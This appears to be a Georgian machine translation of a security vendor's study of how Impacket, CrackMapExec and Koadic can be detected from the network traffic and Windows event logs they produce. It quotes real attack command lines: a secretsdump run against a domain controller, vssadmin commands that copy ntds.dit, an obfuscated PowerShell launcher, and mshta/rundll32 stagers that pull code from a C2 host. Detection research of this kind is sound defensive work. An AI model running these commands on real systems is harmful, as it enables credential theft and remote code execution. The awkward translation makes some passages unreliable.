როგორ ამოვიცნოთ შეტევები Windows ინფრასტრუქტურაზე: ჰაკერების ინსტრუმენტების შესწავლა

კორპორატიულ სექტორში თავდასხმების რიცხვი ყოველწლიურად იზრდება: მაგალითად 2017 წელს 13%-ით მეტი უნიკალური ინციდენტი დაფიქსირდა ვიდრე 2016 წელს, ხოლო 2018 წლის ბოლოს - 27%-ით მეტი ინციდენტივიდრე წინა პერიოდში. მათ შორის, სადაც მთავარი სამუშაო ინსტრუმენტი არის Windows ოპერაციული სისტემა. 2017-2018 წლებში APT Dragonfly, APT28, APT MuddyWater განახორციელეს თავდასხმები სამთავრობო და სამხედრო ორგანიზაციებზე ევროპაში, ჩრდილოეთ ამერიკასა და საუდის არაბეთში. და ჩვენ გამოვიყენეთ სამი ინსტრუმენტი ამისათვის - იმპაკეტი, CrackMapExec и კოადიკი. მათი წყაროს კოდი ღიაა და ხელმისაწვდომია GitHub-ზე.

აღსანიშნავია, რომ ეს ინსტრუმენტები გამოიყენება არა თავდაპირველი შეღწევისთვის, არამედ ინფრასტრუქტურის შიგნით შეტევის განსავითარებლად. თავდამსხმელები იყენებენ მათ შეტევის სხვადასხვა ეტაპზე პერიმეტრის შეღწევის შემდეგ. სხვათა შორის, ამის აღმოჩენა ძნელია და ხშირად მხოლოდ ტექნოლოგიების დახმარებით ქსელის ტრაფიკში კომპრომისის კვალის იდენტიფიცირება ან ინსტრუმენტები, რომლებიც საშუალებას იძლევა აღმოაჩინოს თავდამსხმელის აქტიური ქმედებები ინფრასტრუქტურაში შეღწევის შემდეგ. ინსტრუმენტები უზრუნველყოფს მრავალფეროვან ფუნქციას, ფაილების გადაცემიდან რეესტრთან ურთიერთქმედებით და დისტანციურ მანქანაზე ბრძანებების შესრულებამდე. ჩვენ ჩავატარეთ ამ ინსტრუმენტების კვლევა მათი ქსელის აქტივობის დასადგენად.

რისი გაკეთება გვჭირდებოდა:

• გაიგეთ როგორ მუშაობს ჰაკერების ინსტრუმენტები. გაარკვიეთ, რა უნდა გამოიყენონ თავდამსხმელებმა და რა ტექნოლოგიების გამოყენება შეუძლიათ.
• იპოვეთ ის, რაც არ არის აღმოჩენილი ინფორმაციული უსაფრთხოების ინსტრუმენტებით თავდასხმის პირველ ეტაპზე. დაზვერვის ფაზა შეიძლება გამოტოვოთ, ან იმიტომ, რომ თავდამსხმელი არის შიდა თავდამსხმელი, ან იმიტომ, რომ თავდამსხმელი იყენებს ნახვრეტს ინფრასტრუქტურაში, რომელიც ადრე არ იყო ცნობილი. შესაძლებელი ხდება მისი ქმედებების მთელი ჯაჭვის აღდგენა, აქედან გამომდინარე, შემდგომი მოძრაობის გამოვლენის სურვილი.
• აღმოფხვრა ცრუ პოზიტივი შეჭრის აღმოჩენის ხელსაწყოებიდან. არ უნდა დაგვავიწყდეს, რომ როდესაც გარკვეული ქმედებები გამოვლენილია მხოლოდ დაზვერვის საფუძველზე, შესაძლებელია ხშირი შეცდომები. როგორც წესი, ინფრასტრუქტურაში არის საკმარისი რაოდენობის გზები, ერთი შეხედვით ლეგიტიმურისგან განურჩეველი, ნებისმიერი ინფორმაციის მისაღებად.

რას აძლევს ეს ინსტრუმენტები თავდამსხმელებს? თუ ეს არის Impacket, მაშინ თავდამსხმელები იღებენ მოდულების დიდ ბიბლიოთეკას, რომლებიც შეიძლება გამოყენებულ იქნას შეტევის სხვადასხვა ეტაპზე, რომელიც მოჰყვება პერიმეტრის გარღვევას. ბევრი ინსტრუმენტი იყენებს Impacket-ის მოდულებს შინაგანად - მაგალითად, Metasploit. მას აქვს dcomexec და wmiexec დისტანციური ბრძანების შესასრულებლად, secretsdump მეხსიერებიდან ანგარიშების მისაღებად, რომლებიც დამატებულია Impacket-დან. შედეგად, ასეთი ბიბლიოთეკის საქმიანობის სწორი გამოვლენა უზრუნველყოფს წარმოებულების გამოვლენას.

შემთხვევითი არ არის, რომ შემქმნელებმა დაწერეს "Powered by Impacket" CrackMapExec (ან უბრალოდ CME) შესახებ. გარდა ამისა, CME-ს აქვს მზა ფუნქციონალობა პოპულარული სცენარებისთვის: Mimikatz პაროლების ან მათი ჰეშის მისაღებად, Meterpreter-ის ან Empire აგენტის დანერგვა დისტანციური შესრულებისთვის და Bloodhound ბორტზე.

მესამე ინსტრუმენტი, რომელიც ჩვენ ავირჩიეთ, იყო Koadic. ის საკმაოდ ცოტა ხნის წინ იყო წარმოდგენილი, იგი 25 წელს იყო წარმოდგენილი ჰაკერების საერთაშორისო კონფერენციაზე DEFCON 2017 და გამოირჩევა არასტანდარტული მიდგომით: მუშაობს HTTP, Java Script და Microsoft Visual Basic Script (VBS) საშუალებით. ამ მიდგომას ჰქვია მიწის გარეთ ცხოვრება: ინსტრუმენტი იყენებს Windows-ში ჩაშენებულ დამოკიდებულებებსა და ბიბლიოთეკებს. შემქმნელები მას უწოდებენ COM Command & Control, ან C3.

IMPACKET

Impacket-ის ფუნქციონალობა ძალიან ფართოა, დაწყებული AD-ის შიგნით დაზვერვიდან და მონაცემების შეგროვებით შიდა MS SQL სერვერებიდან, სერთიფიკატების მოპოვების ტექნიკამდე: ეს არის SMB სარელეო შეტევა და ntds.dit ფაილის მიღება, რომელიც შეიცავს მომხმარებლის პაროლების ჰეშებს დომენის კონტროლერიდან. Impacket ასევე ასრულებს ბრძანებებს დისტანციურად ოთხი განსხვავებული მეთოდის გამოყენებით: WMI, Windows Scheduler Management Service, DCOM და SMB და ამისათვის მოითხოვს რწმუნებათა სიგელებს.

Secretsdump

მოდით შევხედოთ secretsdump-ს. ეს არის მოდული, რომელსაც შეუძლია მიმართოს როგორც მომხმარებლის მანქანებს, ასევე დომენის კონტროლერებს. მისი გამოყენება შესაძლებელია მეხსიერების არეების LSA, SAM, SECURITY, NTDS.dit ასლების მისაღებად, ასე რომ, მისი ნახვა შესაძლებელია შეტევის სხვადასხვა ეტაპზე. მოდულის მუშაობის პირველი ნაბიჯი არის ავთენტიფიკაცია SMB-ის საშუალებით, რომელიც მოითხოვს მომხმარებლის პაროლს ან მის ჰეშს, რათა ავტომატურად განახორციელოს Pass the Hash შეტევა. შემდეგ მოდის მოთხოვნა სერვისის კონტროლის მენეჯერზე (SCM) წვდომის გასახსნელად და რეესტრში წვდომის მისაღებად winreg პროტოკოლის საშუალებით, რომლის გამოყენებით თავდამსხმელს შეუძლია გაარკვიოს ინტერესის ფილიალების მონაცემები და მიიღოს შედეგები SMB-ის საშუალებით.

ნახ. 1 ჩვენ ვხედავთ, თუ როგორ ზუსტად ხდება winreg პროტოკოლის გამოყენებისას, წვდომა მიიღება რეესტრის გასაღების გამოყენებით LSA. ამისათვის გამოიყენეთ DCERPC ბრძანება opcode 15 - OpenKey.

ბრინჯი. 1. რეესტრის გასაღების გახსნა winreg პროტოკოლის გამოყენებით

შემდეგ, როდესაც კლავიშზე წვდომა მიიღება, მნიშვნელობები ინახება SaveKey ბრძანებით opcode 20. Impacket ამას აკეთებს ძალიან სპეციფიკური გზით. ის ინახავს მნიშვნელობებს ფაილში, რომლის სახელია 8 შემთხვევითი სიმბოლოსგან შემდგარი სტრიქონი, რომელსაც დართული აქვს .tmp. გარდა ამისა, ამ ფაილის შემდგომი ატვირთვა ხდება SMB-ის მეშვეობით System32 დირექტორიადან (ნახ. 2).

ბრინჯი. 2. დისტანციური აპარატიდან რეესტრის გასაღების მიღების სქემა

გამოდის, რომ ქსელში ასეთი აქტივობის აღმოჩენა შესაძლებელია რეესტრის გარკვეულ ფილიალებში შეკითხვით winreg პროტოკოლის, კონკრეტული სახელების, ბრძანებების და მათი თანმიმდევრობის გამოყენებით.

ეს მოდული ასევე ტოვებს კვალს Windows-ის მოვლენის ჟურნალში, რაც აადვილებს ამოცნობას. მაგალითად, ბრძანების შესრულების შედეგად

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Windows Server 2016 ჟურნალში ჩვენ დავინახავთ მოვლენების შემდეგ ძირითად თანმიმდევრობას:

1. 4624 - დისტანციური შესვლა.
2. 5145 - winreg დისტანციურ სერვისზე წვდომის უფლებების შემოწმება.
3. 5145 - ფაილზე წვდომის უფლებების შემოწმება System32 დირექტორიაში. ფაილს აქვს ზემოთ ნახსენები შემთხვევითი სახელი.
4. 4688 - cmd.exe პროცესის შექმნა, რომელიც იწყებს vssadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - პროცესის შექმნა ბრძანებით:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - პროცესის შექმნა ბრძანებით:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - პროცესის შექმნა ბრძანებით:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

სმბექსეკი

ისევე როგორც მრავალი პოსტ-ექსპლუატაციის ხელსაწყო, Impacket-ს აქვს მოდულები დისტანციურად შესასრულებელი ბრძანებებისთვის. ჩვენ ყურადღებას გავამახვილებთ smbexec-ზე, რომელიც უზრუნველყოფს ინტერაქტიული ბრძანების გარსს დისტანციურ მანქანაზე. ეს მოდული ასევე საჭიროებს ავთენტიფიკაციას SMB-ის საშუალებით, პაროლით ან პაროლის ჰეშით. ნახ. 3-ზე ჩვენ ვხედავთ მაგალითს, თუ როგორ მუშაობს ასეთი ინსტრუმენტი, ამ შემთხვევაში ეს არის ადგილობრივი ადმინისტრატორის კონსოლი.

ბრინჯი. 3. ინტერაქტიული smbexec კონსოლი

smbexec-ის პირველი ნაბიჯი ავტორიზაციის შემდეგ არის SCM-ის გახსნა OpenSCManagerW ბრძანებით (15). მოთხოვნა აღსანიშნავია: MachineName ველი არის DUMMY.

ბრინჯი. 4. სერვისის კონტროლის მენეჯერის გახსნის მოთხოვნა

შემდეგი, სერვისი იქმნება CreateServiceW ბრძანების გამოყენებით (12). smbexec-ის შემთხვევაში, ყოველ ჯერზე შეგვიძლია დავინახოთ იგივე ბრძანების კონსტრუქციის ლოგიკა. ნახ. 5 მწვანე მიუთითებს უცვლელი ბრძანების პარამეტრებზე, ყვითელი მიუთითებს იმაზე, თუ რა შეუძლია შეცვალოს თავდამსხმელმა. ადვილი მისახვედრია, რომ შესრულებადი ფაილის სახელი, მისი დირექტორია და გამომავალი ფაილი შეიძლება შეიცვალოს, მაგრამ დანარჩენის შეცვლა ბევრად უფრო რთულია Impacket მოდულის ლოგიკის დარღვევის გარეშე.

ბრინჯი. 5. მოითხოვეთ სერვისის შექმნა სერვისის კონტროლის მენეჯერის გამოყენებით

Smbexec ასევე ტოვებს აშკარა კვალს Windows-ის ღონისძიებების ჟურნალში. Windows Server 2016 ჟურნალში ინტერაქტიული ბრძანების გარსისთვის ipconfig ბრძანებით, ჩვენ დავინახავთ მოვლენების შემდეგ ძირითად თანმიმდევრობას:

1. 4697 — სერვისის დაყენება მსხვერპლის მანქანაზე:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - cmd.exe პროცესის შექმნა 1 პუნქტის არგუმენტებით.
3. 5145 - C$ დირექტორიაში __output ფაილზე წვდომის უფლებების შემოწმება.
4. 4697 — სერვისის დაყენება დაზარალებულის მანქანაზე.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - cmd.exe პროცესის შექმნა 4 პუნქტის არგუმენტებით.
6. 5145 - C$ დირექტორიაში __output ფაილზე წვდომის უფლებების შემოწმება.

Impacket არის საფუძველი თავდასხმის ინსტრუმენტების განვითარებისთვის. იგი მხარს უჭერს Windows ინფრასტრუქტურის თითქმის ყველა პროტოკოლს და ამავე დროს აქვს თავისი დამახასიათებელი მახასიათებლები. აქ არის კონკრეტული winreg მოთხოვნები და SCM API-ს გამოყენება დამახასიათებელი ბრძანების ფორმირებით, ფაილის სახელის ფორმატით და SMB share SYSTEM32.

CRACKMAPEXEC

CME ინსტრუმენტი შექმნილია ძირითადად იმ რუტინული მოქმედებების ავტომატიზაციისთვის, რომლებიც თავდამსხმელმა უნდა შეასრულოს ქსელში წინსვლისთვის. ის საშუალებას გაძლევთ იმუშაოთ ცნობილ Empire-ის აგენტთან და Meterpreter-თან ერთად. ბრძანებების ფარულად შესასრულებლად, CME-ს შეუძლია მათი დაბინდვა. Bloodhound-ის (ცალკე დაზვერვის ხელსაწყოს) გამოყენებით, თავდამსხმელს შეუძლია დომენის აქტიური ადმინისტრატორის სესიის ძიების ავტომატიზაცია.

სისხლის გადასხმა

Bloodhound, როგორც დამოუკიდებელი ინსტრუმენტი, საშუალებას იძლევა მოწინავე დაზვერვა ქსელში. ის აგროვებს მონაცემებს მომხმარებლების, მანქანების, ჯგუფების, სესიების შესახებ და მოწოდებულია PowerShell სკრიპტის ან ორობითი ფაილის სახით. ინფორმაციის შესაგროვებლად გამოიყენება LDAP ან SMB-ზე დაფუძნებული პროტოკოლები. CME ინტეგრაციის მოდული საშუალებას აძლევს Bloodhound-ს ჩამოტვირთოს მსხვერპლის მანქანაში, გაუშვას და მიიღოს შეგროვებული მონაცემები შესრულების შემდეგ, რითაც ავტომატიზირებს სისტემაში მოქმედებებს და გახდის მათ ნაკლებად შესამჩნევს. Bloodhound გრაფიკული გარსი წარმოგიდგენთ შეგროვებულ მონაცემებს გრაფიკების სახით, რაც საშუალებას გაძლევთ იპოვოთ უმოკლესი გზა თავდამსხმელის მანქანიდან დომენის ადმინისტრატორამდე.

ბრინჯი. 6. Bloodhound ინტერფეისი

მსხვერპლის მანქანაზე გასაშვებად მოდული ქმნის დავალებას ATSVC და SMB გამოყენებით. ATSVC არის ინტერფეისი Windows Task Scheduler-თან მუშაობისთვის. CME იყენებს თავის NetrJobAdd(1) ფუნქციას, რათა შექმნას ამოცანები ქსელში. მაგალითი იმისა, თუ რას აგზავნის CME მოდული ნაჩვენებია ნახ. 7: ეს არის cmd.exe ბრძანების გამოძახება და ბუნდოვანი კოდი XML ფორმატში არგუმენტების სახით.

ნახ.7. დავალების შექმნა CME-ის საშუალებით

დავალების შესასრულებლად წარდგენის შემდეგ, მსხვერპლის მანქანა იწყებს თავად Bloodhound-ს და ეს ჩანს მოძრაობაში. მოდული ხასიათდება LDAP მოთხოვნებით სტანდარტული ჯგუფების, დომენის ყველა აპარატისა და მომხმარებლის სიის მისაღებად და მომხმარებლის აქტიური სესიების შესახებ ინფორმაციის მისაღებად SRVSVC NetSessEnum მოთხოვნის საშუალებით.

ბრინჯი. 8. აქტიური სესიების სიის მიღება SMB-ის საშუალებით

გარდა ამისა, Bloodhound-ის გაშვებას მსხვერპლის აპარატზე ჩართული აუდიტით თან ახლავს ღონისძიება ID 4688 (პროცესის შექმნა) და პროცესის სახელი. «C:WindowsSystem32cmd.exe». რაც აღსანიშნავია ამაში არის ბრძანების ხაზის არგუმენტები:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

enum_avproducts მოდული ძალიან საინტერესოა ფუნქციონალური და განხორციელების თვალსაზრისით. WMI საშუალებას გაძლევთ გამოიყენოთ WQL შეკითხვის ენა Windows-ის სხვადასხვა ობიექტებიდან მონაცემების მოსაპოვებლად, რასაც არსებითად იყენებს ეს CME მოდული. ის წარმოქმნის შეკითხვებს AntiSpywareProduct და AntiМirusProduct კლასებში დაზარალებულის აპარატზე დაინსტალირებული დაცვის ხელსაწყოების შესახებ. საჭირო მონაცემების მისაღებად მოდული უერთდება rootSecurityCenter2 სახელთა სივრცეს, შემდეგ ქმნის WQL მოთხოვნას და იღებს პასუხს. ნახ. სურათი 9 გვიჩვენებს ასეთი მოთხოვნებისა და პასუხების შინაარსს. ჩვენს მაგალითში ნაპოვნია Windows Defender.

ბრინჯი. 9. enum_avproducts მოდულის ქსელური აქტივობა

ხშირად, WMI აუდიტი (Trace WMI-Activity), რომლის ღონისძიებებშიც შეგიძლიათ იპოვოთ სასარგებლო ინფორმაცია WQL მოთხოვნების შესახებ, შეიძლება გამორთული იყოს. მაგრამ თუ ის ჩართულია, მაშინ თუ enum_avproducts სკრიპტი გაშვებულია, შეინახება მოვლენა ID 11. ის შეიცავს მომხმარებლის სახელს, რომელმაც გაგზავნა მოთხოვნა და სახელი rootSecurityCenter2 სახელთა სივრცეში.

თითოეულ CME მოდულს გააჩნდა საკუთარი არტეფაქტები, იქნება ეს კონკრეტული WQL მოთხოვნები თუ გარკვეული ტიპის დავალების შექმნა ამოცანების განრიგში დაბნელებით და Bloodhound-ის სპეციფიკური აქტივობით LDAP-სა და SMB-ში.

KOADIC

Koadic-ის გამორჩეული თვისებაა Windows-ში ჩაშენებული JavaScript და VBScript ინტერპრეტატორების გამოყენება. ამ თვალსაზრისით, ის მიჰყვება მიწის ნაკვეთის ტენდენციას - ანუ მას არ აქვს გარე დამოკიდებულებები და იყენებს Windows-ის სტანდარტულ ინსტრუმენტებს. ეს არის სრული Command & Control (CnC) ინსტრუმენტი, რადგან ინფექციის შემდეგ მანქანაზე დამონტაჟებულია "იმპლანტი", რომელიც საშუალებას აძლევს მის კონტროლს. ასეთ მანქანას კოადური ტერმინოლოგიით „ზომბი“ ეწოდება. თუ მსხვერპლის მხრიდან სრული ოპერაციისთვის არასაკმარისი პრივილეგიებია, Koadic-ს აქვს შესაძლებლობა გაზარდოს ისინი მომხმარებლის ანგარიშის კონტროლის შემოვლითი (UAC შემოვლითი) ტექნიკის გამოყენებით.

ბრინჯი. 10. Koadic Shell

დაზარალებულმა უნდა დაიწყოს კომუნიკაცია Command & Control სერვერთან. ამისათვის მას უნდა დაუკავშირდეს ადრე მომზადებულ URI-ს და მიიღოს მთავარი Koadic ორგანო ერთ-ერთი სტაჟერის გამოყენებით. ნახ. სურათი 11 გვიჩვენებს მაგალითს mshta stager-ისთვის.

ბრინჯი. 11. სესიის ინიცირება CnC სერვერთან

WS პასუხის ცვლადის საფუძველზე ირკვევა, რომ შესრულება ხდება WScript.Shell-ის მეშვეობით, ხოლო ცვლადები STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE შეიცავს საკვანძო ინფორმაციას მიმდინარე სესიის პარამეტრების შესახებ. ეს არის პირველი მოთხოვნა-პასუხის წყვილი HTTP კავშირში CnC სერვერთან. შემდგომი მოთხოვნები პირდაპირ კავშირშია მოწოდებული მოდულების (იმპლანტების) ფუნქციონალურობასთან. ყველა Koadic მოდული მუშაობს მხოლოდ აქტიური სესიით CnC-ით.

მიმიკატ

ისევე, როგორც CME მუშაობს Bloodhound-თან, Koadic მუშაობს Mimikatz-თან, როგორც ცალკე პროგრამასთან და აქვს მისი გაშვების მრავალი გზა. ქვემოთ მოცემულია მოთხოვნა-პასუხის წყვილი Mimikatz იმპლანტის ჩამოსატვირთად.

ბრინჯი. 12. მიმიკაცის გადაცემა კოადიკზე

თქვენ ხედავთ, თუ როგორ შეიცვალა URI ფორმატი მოთხოვნაში. ახლა ის შეიცავს csrf ცვლადის მნიშვნელობას, რომელიც პასუხისმგებელია არჩეულ მოდულზე. ყურადღება არ მიაქციოთ მის სახელს; ჩვენ ყველამ ვიცით, რომ CSRF ჩვეულებრივ სხვაგვარად არის გაგებული. პასუხი იყო Koadic-ის იგივე ძირითადი ნაწილი, რომელსაც დაემატა მიმიკაცთან დაკავშირებული კოდი. ის საკმაოდ დიდია, ამიტომ მოდით გადავხედოთ ძირითად პუნქტებს. აქ გვაქვს Mimikatz-ის ბიბლიოთეკა, რომელიც კოდირებულია base64-ში, სერიული .NET კლასი, რომელიც გამოიმუშავებს მას და არგუმენტები Mimikatz-ის გასაშვებად. შესრულების შედეგი გადაიცემა ქსელში მკაფიო ტექსტით.

ბრინჯი. 13. დისტანციურ მანქანაზე Mimikatz-ის გაშვების შედეგი

Exec_cmd

Koadic-ს ასევე აქვს მოდულები, რომლებსაც შეუძლიათ დისტანციურად შეასრულონ ბრძანებები. აქ ჩვენ ვნახავთ იგივე URI გენერირების მეთოდს და ნაცნობ sid და csrf ცვლადებს. exec_cmd მოდულის შემთხვევაში, კოდი ემატება სხეულს, რომელსაც შეუძლია შეასრულოს shell ბრძანებები. ქვემოთ ნაჩვენებია ასეთი კოდი, რომელიც შეიცავს CnC სერვერის HTTP პასუხს.

ბრინჯი. 14. იმპლანტის კოდი exec_cmd

კოდის შესასრულებლად საჭიროა GAWTUUGCFI ცვლადი ნაცნობი WS ატრიბუტით. მისი დახმარებით, იმპლანტი უწოდებს გარსს, ამუშავებს კოდის ორ ტოტს - shell.exec გამომავალი მონაცემების ნაკადის დაბრუნებით და shell.run დაბრუნების გარეშე.

Koadic არ არის ტიპიური ინსტრუმენტი, მაგრამ მას აქვს საკუთარი არტეფაქტები, რომლითაც მისი პოვნა ლეგიტიმურ ტრაფიკშია შესაძლებელი:

• HTTP მოთხოვნების სპეციალური ფორმირება,
• winHttpRequests API-ს გამოყენებით,
• WScript.Shell ობიექტის შექმნა ActiveXObject-ის მეშვეობით,
• დიდი შესრულებადი სხეული.

თავდაპირველი კავშირი ინიცირებულია სტეიჯერის მიერ, ამიტომ შესაძლებელია მისი აქტივობის აღმოჩენა Windows-ის ღონისძიებების საშუალებით. mshta-სთვის ეს არის მოვლენა 4688, რომელიც მიუთითებს პროცესის შექმნაზე start ატრიბუტით:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

სანამ Koadic მუშაობს, შეგიძლიათ ნახოთ სხვა 4688 მოვლენა ატრიბუტებით, რომლებიც შესანიშნავად ახასიათებს მას:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

დასკვნები

მიწის ნაკვეთიდან ცხოვრების ტენდენცია კრიმინალებში პოპულარობას იძენს. ისინი იყენებენ Windows-ში ჩაშენებულ ინსტრუმენტებსა და მექანიზმებს მათი საჭიროებისთვის. ჩვენ ვხედავთ პოპულარულ ინსტრუმენტებს Koadic, CrackMapExec და Impacket, რომლებიც ამ პრინციპს იცავენ, სულ უფრო ხშირად ჩნდებიან APT ანგარიშებში. ასევე იზრდება ჩანგლების რაოდენობა GitHub-ზე ამ ხელსაწყოებისთვის და ჩნდება ახლები (ახლა უკვე დაახლოებით ათასია). ტენდენცია პოპულარობას იძენს მისი სიმარტივის გამო: თავდამსხმელებს არ სჭირდებათ მესამე მხარის ხელსაწყოები; ისინი უკვე არიან დაზარალებულთა მანქანებზე და ეხმარებიან მათ უსაფრთხოების ზომების გვერდის ავლით. ჩვენ ყურადღებას ვამახვილებთ ქსელური კომუნიკაციის შესწავლაზე: ზემოთ აღწერილი თითოეული ინსტრუმენტი ტოვებს საკუთარ კვალს ქსელურ ტრაფიკში; მათმა დეტალურმა შესწავლამ საშუალება მოგვცა გვესწავლებინა ჩვენი პროდუქტი PT ქსელის თავდასხმის აღმოჩენა აღმოაჩინონ ისინი, რაც საბოლოოდ ეხმარება მათთან დაკავშირებული კიბერ ინციდენტების მთელი ჯაჭვის გამოძიებას.

ავტორები:

• ანტონ ტიურინი, PT Expert Security Center, Positive Technologies, საექსპერტო მომსახურების დეპარტამენტის უფროსი
• ეგორ პოდმოკოვი, ექსპერტი, PT ექსპერტი უსაფრთხოების ცენტრი, პოზიტიური ტექნოლოგიები

წყარო: www.habr.com